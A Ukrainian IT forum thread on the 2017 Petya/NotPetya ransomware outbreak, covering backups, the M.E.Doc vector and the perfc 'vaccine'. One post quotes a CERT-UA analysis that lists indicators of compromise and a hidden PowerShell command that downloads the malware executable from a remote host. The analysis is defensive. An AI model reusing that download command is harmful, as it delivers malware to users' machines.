Новий вірус NePetya, Petya.A, ExPetya и WannaCry-2

[Deemon]

Так прямо там же і спостерігай, вже 35 переказів, на 3.5 бітка ~ $8600 заробили...

[jack74]

ну так а я про шо. Платять люди

[difoto]

1 година тому, Deemon сказано:

Так прямо там же і спостерігай, вже 35 переказів, на 3.5 бітка ~ $8600 заробили...

офтоп: в мене приятель кілька років тому задовбався майнити (а займався тим майже з самого початку, тобто один з перших) і здав 18(!!!) БТС десь по 100 баксів, купив стареньку тачку. Зараз би вийшла нова.

[Абдул-Хамид]

Реальний спосіб захиститися від Петі

[Oli]

Робочий ранок...

[AgentSmith13]

16 часов назад, charlie сказал:

ясно, внутрішня мережа, xp з незахищеними портами

 

та специфічний він, треба багато часу, щоб там наловчитись. про простих користувачів, які взагалі ні бум-бум взагалі мовчу

Після запуску одними розумниками в мене на роботі шифратора (без суперфатальних наслідків) поставив їм саме Лінукс - Убунту, з Thunderbird, Chrome,Firefox, Foxit Reader, LibreOffice, на питання "де косинка, поставив нам якусь херню" - відповідь  - "не заслужили, і взагалі, пишіть на мене, гада, службову, тільки після того, як я на неї відповім, збирайте манатки і на біржу праці бігом". Сидять, ПРАЦЮЮТЬ.

За "ВПНчики" для "вкантактіків" - 2 тижні без інету. Хоч флешкою носи, прохання, "я роботи робити не можу", "піду до керівництва" - не діє, то раз, ну і не працюють ті плагіни для Хрома через проксі. Яндекс браузер і Аміги різні качав - аналогічно.

І взагалі, захист від того один - окремий сервак на Лінукс/ФріБСД чи НАС з налаштованим ФТП всередині мережі, і періодичний бекап файлів кожного користувача програмою типу  Cobian Backup (вміє і папки, і файли, і по мережі, і по ФТП, і з мережі і ФТП кудись, і різні архіви робити, і файл, що використовується навіть, і зберігати певну кількість комій - за 14 днів, наприклад...). Ну і під страхом покарання гривнею, аж до отримання голого окладу пару місяців (а до декого й те не доходить) впровадження політики зберігання ВСІХ РОБОЧИХ документів (вкинув фільм/музичку/фоточки, заср*в місце на серваку з бекапами - мінус премія) в папці, наприклад, ROBOTA, на диску D, яка, власне і буде бекапитися (ну, і, можливо, папка з поштою, якщо клієнти поштові використовувати). Запустили йолопи - півгодини максимум на відновлення - 15 хв на відновлення системи з образу, де все вже налаштовано, 15 на розпаковку архіву з роботою і поштою на диск Д. Все. Хочеш на роботі зберігати власні "розважальні" файлики - не дивуйся, коли вони зникнуть, а робота залишиться. Я б ще тим, хто на робочий стіл зберігає, спецом скрипта написам, щоб при кожному перезавантаженні все, що не внесене в список потрібних ярликів, видаляло. Разок перенабрав документа на сторінок 20-30, і рефлекс виробиться.

Єдиний мінус даного методу - все-таки треба а) окремий ПК під сервер чи купити НАС, який толковий з можливісю напхати багато дисків теж не дешевий; б) в залежності від кількості юзерів може знадобитися і 10, і  20 Тб жорстких дисків купити (а враховуючи, що все-таки краще таки зробити дзеркало - то можна множити на 2). Ну і адміну за налаштування того НЕ забути заплатити (а робляться такі речі не в робочий час).

Але тут вибір вже для керівництва - потратити трохи грошей і спати спокійно, чи  поступити по принципу "авось" (а як пошифрує все, обов'язково покарати придурка-адміна, який ходить, гроші клянчить - він же ПРОГРАМІСТ, він мав захистити), і мати купу проблем.

І так, антивіруси - по барабану - бачив пошифровані ПК і з Нортоном, і з Авірою, і з ЕСЕТом, і з Пандою, і з чим тільки не... Без бекапів зараз працювати - то як на міні морській сидіти і по детонатору молотком валити.

[Lisovic]

Є вже деяка аналітика http://cert.gov.ua/?p=2641

Як і говорилось раніш, була використана дірка в офісі CVE-2017-0199, на почту приходив файл, з розширенням .doc, відповідно ніяке блокування на нього не діяло.

Єдине що мені незрозуміло це як він отримував підвищення прав. Хоча можливо комп'ютер жертви і не шифрувався, якщо прав не хватало, а шифрувались решта в мережі, використовуючи дірку в SMB

 

Показати прихований контент  

Petya Ransomware Попередній Аналіз CVE-2017-0199 + MS17-010

27/06/2017

 

В першій половині дня розпочалася масова атака на український та комерційний сектор із застосування шкідливого програмного забезпечення, що позиціонується як Petya Ransomware. 

Спеціалістами команди реагування на комп’ютерні надзвичайні подій України CERT-UA був проаналізований файл: 

[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]
hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/

Даний файл, експлуатовував вразливість CVE-2017-0199 (https://github.com/bhdresh/CVE-2017-0199).
Після експлуатації вразливості на інфікований комп’ютер завантажувався xls-файл (hxxp://84.200.16.242/myguy.xls)
[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]
hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/

Даний xls-файл виступав в якості завантажувача та містив в собі обфускований javascript код. 

Після деобфускації коду вдалося вияснити, що за допомогою команди Powershell на інфікований комп’ютербув завантажений виконуваний файл:
[myguy.exe][224500132b2537d599fe3314717b7ee5]

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)

Даний виконуваний файл використовувся в якості завантажувача подальшого функціоналу шифрувальника файлів Petya Ransomware.

Командно-контрольний центр: 
hххp://coffeinoffice.xyz:80/cup/wish.php 

Механізм розповсюдження був запозичений від шифрувальника файлів WannaCry, що використовувала вразливість MS17-010 для розповсюдження як по локальній так і по глобальній мережі.

Після шифрування комп’ютера відбувалося перезавантаження системи, в результаті якої жертва отримувала повідомлення про викуп.
Даний тип шифрувальника пошкоджував таблицю MBR, в результаті чого завантаження операційної системи не продовжувалося.

За попередніми даними даний виконуваний файл завантажував в директорію C:\Windows файл з назвою perfc.dat, що виступав в якості основого функціоналу даного шифрувальника. Вдалося вияснити, що шифрувальник файлів встановлював в планувальнику задач команду на перезапуск системи. Після перезавантаження системи на інфікований комп’ютер приходив фейковий chkdsk. 

Отже, можна стверджувати, що новий підвид Petya.A, який сьогодні атакував Україну — це комбінація вразливостей
CVE-2017-0199 і MS17-010 (ETERNALBLUE, використана в Wcry за результатами витоку через ShadowBrokers).

 

Перелік індикаторів компрометації:

84.200.16.242:80

french-cooking.com:443

coffeinoffice.xyz:80

File Name Order-20062017.doc (RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206

File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6

 

Рекомендації CERT-UA:

1. Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви; наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).

2. Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштового й веб-трафіку.

3. Установити офіційний патч MS17-010.

4. На мережевому обладнанні та груповими політиками заблокувати на системах та серверах порти 135, 445, 1024-1035 TCP.

5. В разі інфікування персонального комп’ютера не перезавантажувати систему.

6. Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.

7. Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.

8. Для можливості відновлення зашифрованих файлів скористатися програмами ShadowExplorer або PhotoRec.

 

 

 

Hide  

[dj_design]

єдиний позитив в цього випадку, особисто для мене .. хоча .. це більше навіть надія ... що можливо нарешті вставлять доброго пістона тим "крутим мега програмерам" за їх супер мега захищений софт під назвою "МеДок" ... і до когось нарешті дійде, що проста програма для відправки звітності не повинна бути таким "тупим монстром" ....

[AgentSmith13]

10 минут назад, Lisovic сказал:

Для можливості відновлення зашифрованих файлів скористатися програмами ShadowExplorer або PhotoRec

Ага, ага... R-Studio ще забули...

 

10 минут назад, Lisovic сказал:

Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях

В мене дещо раніше і відкрили, не почитавши ні відправника, нічого крім грізної назви типу "Кабмін" - а то ж вся звірина в лісі певно повиздихає, як не друкануть листа керівництву зразу ж, як отримали. Бігом! Думати будем потім...

 

6 минут назад, dj_design сказал:

єдиний позитив в цього випадку, особисто для мене .. хоча .. це більше навіть надія ... що можливо нарешті вставлять доброго пістона тим "крутим мега програмерам" за їх супер мега захищений софт під назвою "МеДок" ... і до когось нарешті дійде, що проста програма для відправки звітності не повинна бути таким "тупим монстром" ....

Дааавно пора! Вони в нас ще вимагали зробити на комах бухгалтерських інет напряму, не через проксі, послав. А як цей шматок гівнокоду "резервні копії" туго робить навіть на ПК з 4 -8 Гб оперативки....

[Volyniaka]

[dj_design]

7 минут назад, Volyniaka сказал:

от тільки не потрібно починати про "глючність Вінди" і гарну роботу Лінухи .... за останню добу вже тошнить від таких тем на ФБ .. і всі кругом супер специ і доказують як все гарно і просто на лінуксі .... який гарний Опен Офіс (дуже гарний .. особливо якщо відкривати один документ в тиждень ... я колись ледве не застрелився поки в цьому інтуітивному інтерфейсі добрався до параметрів сторінки ... він морально застарів в зручності робити на десяток років ... а якщо працювати з великими документами або часто їх відкривати і на слабкій машині - жах просто ... )

[Volyniaka]

@dj_design

А як відносно гумору?

[AgentSmith13]

19 минут назад, dj_design сказал:

от тільки не потрібно починати про "глючність Вінди" і гарну роботу Лінухи .... за останню добу вже тошнить від таких тем на ФБ .. і всі кругом супер специ і доказують як все гарно і просто на лінуксі .... який гарний Опен Офіс (дуже гарний .. особливо якщо відкривати один документ в тиждень ... я колись ледве не застрелився поки в цьому інтуітивному інтерфейсі добрався до параметрів сторінки ... )

Не в вінді і не в опенофісі справа - є люди, яким, в силу їх суперздібностей, щоб не мати глобального апокаліпсису в мережі, нічого, крім Лінукса, розмальованого під 7-ку, щоб інфаркту не було, з 5-ма ярличками на робочому столі (пошта, інет, офіс, папка з доками) і такими ж пунктами в меню + "завершити роботу", ставити не можна, перевірено. А Microsoft Office, доречі, чудово себе почуває під Wine...

Який зміст ставити на ПК, де максимум набирають пару сторінок в тиждень, читають пошту і друкують з неї доки, Windows (сама дешева 10 домашня ОЕМ - від 2789 грн. на Розетці) і офіс (2016 - від 6994 грн.)? Там, де є потреба серйозної роботи з документами (графікою, відео, специфічними БД, той же Access), ще зрозуміло.

[jack74]

Цитувати

Итого, спустя сутки нет достоверной информации о том, как заражались машинки, нет сигнатур у крупнейших антивирусных решений, да и все статьи только на уровне предположений. Есть, скажем очень вероятная гипотеза про медок, но полностью не объясняет. Есть гипотеза про долгую скрытую атаку, но восстановленные из бекапов машины чисты. Противоречивая информация о том, помогают ли апдейты от ванна край, но похоже, что нет. Гипотеза о 0-дей уязвимости объяснит что угодно, можно валить на неё все шишки. А меж тем, вирус уже мутировал в новую версию… Риторический вопрос — что происходит? Где пресс-релизы антивирусных компаний, которые сигнатуры обновляют каждый час? (Вот только одна публикация на Хабре, да и то лишь список пострадавших собирают.) Мне кажется, это весьма серьезный удар по их же имиджу. Печально все в общем.

 

Але скоро все будем знати :), бо

ФБР і Міністерство внутрішньої безпеки США почали розслідування атак вірусу Petya.A

Цитувати

У США Федеральне бюро розслідувань (ФБР) і Міністерство внутрішньої безпеки почали розслідування у зв'язку з поширенням вірусу-здирника Petya.A. Про це повідомив прес-секретар Ради національної безпеки США, передає Reuters.

Варто зазначити, що в США ще не говорять про загрозу національній безпеці, проте перед відповідальними відомствами поставлено завдання знайти організаторів кибертаки.

У Міністерстві внутрішньої безпеки порадили жертвам вірусу не платити шантажистам, оскільки це не гарантує відновлення доступу до комп'ютера. Офіційного коментаря від Агентства національної безпеки США не надходило.

Випадки зараження вірусом комп'ютерів-здирником Petya зареєстровані також у Великобританії, Данії, Нідерландах, Ізраїлі, Швеції.

Також від вірусу Petya постраждали Росія, Білорусія, Польща, ФРН та Італія.

 

[Natik]

 в Польші багато торгових мереж теж піймали його. 

 

[AgentSmith13]

Symantec опублікувала рекомендації щодо захисту комп'ютера від зараження вірусом-здирником Petya, який 27 червня атакував компанії по всьому світу. Для цього треба зробити вигляд, що комп'ютер вже заражений. У момент атаки Petya шукає файл C:\Windows\perfc. Якщо такий файл на комп'ютері вже є, то вірус закінчує роботу без зараження. Щоб створити такий файл для захисту від Petya можна використовувати звичайний «Блокнот». Причому різні джерела радять створювати файл perfc (без розширення), або perfc.dll. Фахівці також радять зробити файл доступним тільки для читання, щоб вірус не міг внести в нього зміни.
 

[Natik]

В блогах Microsoft описано основний спосіб інфікування: MEDOC

 

https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/

[AgentSmith13]

Масштабна кібератака на корпоративні мережі і мережі органів влади, яка відбулася вчора, 27 червня, зупинена. Про це повідомляється на сайті Кабінету міністрів України. Зазначається, що ситуація знаходиться під контролем фахівців з кібербезпеки і на даний момент проводиться робота по відновленню втрачених даних.

Цирк та й годі! Як зупинена? Зловили автора, що розсилає заразу? Чи серваки повиключали і сидять-бояться? Особливе ха-ха викликає "відновлення втрачених даних" - бекапів в нас в держустановах зачасту не роблять, бо на сервак чи НАС "нема грошей". От на всякі святкування, концерти, на різну дурню типу бігбордів "БезВІЗ" (про який і так вже певно не те що собаки, блохи знають) - гроші є, на всякі "сертифікати", псевдозахищені "секретні" ПК, "захищені" папірцем канали інтернету теж є, "бо так треба", а на реальну кібербезпеку - немає.

[Zheny@]

2 хвилин тому, AgentSmith13 сказано:

Масштабна кібератака на корпоративні мережі і мережі органів влади, яка відбулася вчора, 27 червня, зупинена.

це щоб люди перестали кіпішувати.

Вчора навіть Приват лежав, бо всі ломанулися за баблом. Весь приват працює без вінди (окрім банкоматів).

[MACCEN]

кому шкода грошей на бекапи або нема часу той погібає

 

може не буде вже ніхто піздіти чому айтішніку так платять тіпа багаото, а наспарвді простой одного дня коштує 10 а то 1000 айтішніків, але всім насрати

[Ukrainec]

Часто стикаюсь з ситуацією коли грамотний спеціаліст не може поясники інформацію менеджеру доступною для нього мовою, мовою грошей. Зазвичай це тихі не амбіційні люди -да? 

Та й впевнений, що висновки з цієї атаки зроблять не всі

Ну втачені файли пояснять форсмажором, якщо з'явиться дешифратор то щей "мана з неба". А далі нагнуть адміна батогом і буде далі все як було.

Слава Мікротіку!

 

[AgentSmith13]

24 минуты назад, MACCEN сказал:

кому шкода грошей на бекапи або нема часу той погібає

 

може не буде вже ніхто піздіти чому айтішніку так платять тіпа багаото, а наспарвді простой одного дня коштує 10 а то 1000 айтішніків, але всім насрати

Хай ще не забувають оплачувати роботу в вихідні і до ночі (ну, краще все-таки так, ніж в робочий день потім писати пояснюючі, чому все лягло і сидіти без грошей), бо зачасту то сприймають як належне - "ти ж програміст, спасай".

P.S. Є інформація, що ДТЕК Ахметова ліг повністю! Сайт - мертвий. Хоч якась гарна новина.

[Ukrainec]

2 хвилин тому, AgentSmith13 сказано:

 

P.S. Є інформація, що ДТЕК Ахметова ліг повністю! Сайт - мертвий. Хоч якась гарна новина.

Це для кого гарна?

По моєму багато для кого це можливість "очиститись" і почати все з чистого листа. Не здивуюсь що і його вклад є до цієї ситуації

[jack74]

1 година тому, AgentSmith13 сказано:

Symantec опублікувала рекомендації ...файл C:\Windows\perfc. ... створити такий файл для захисту від Petya можна використовувати звичайний «Блокнот». Причому різні джерела радять створювати файл perfc (без розширення), або perfc.dll. ...

На позаминулій сторінці я вже цей "рецепт" цитував, і навіть виділив жирним. Правда не від Симантека  Симантеки списують чи плагіатять?

[iralasch]

Хто знає що робити,якщо таке вже сталося?І чи можливо відновити дані?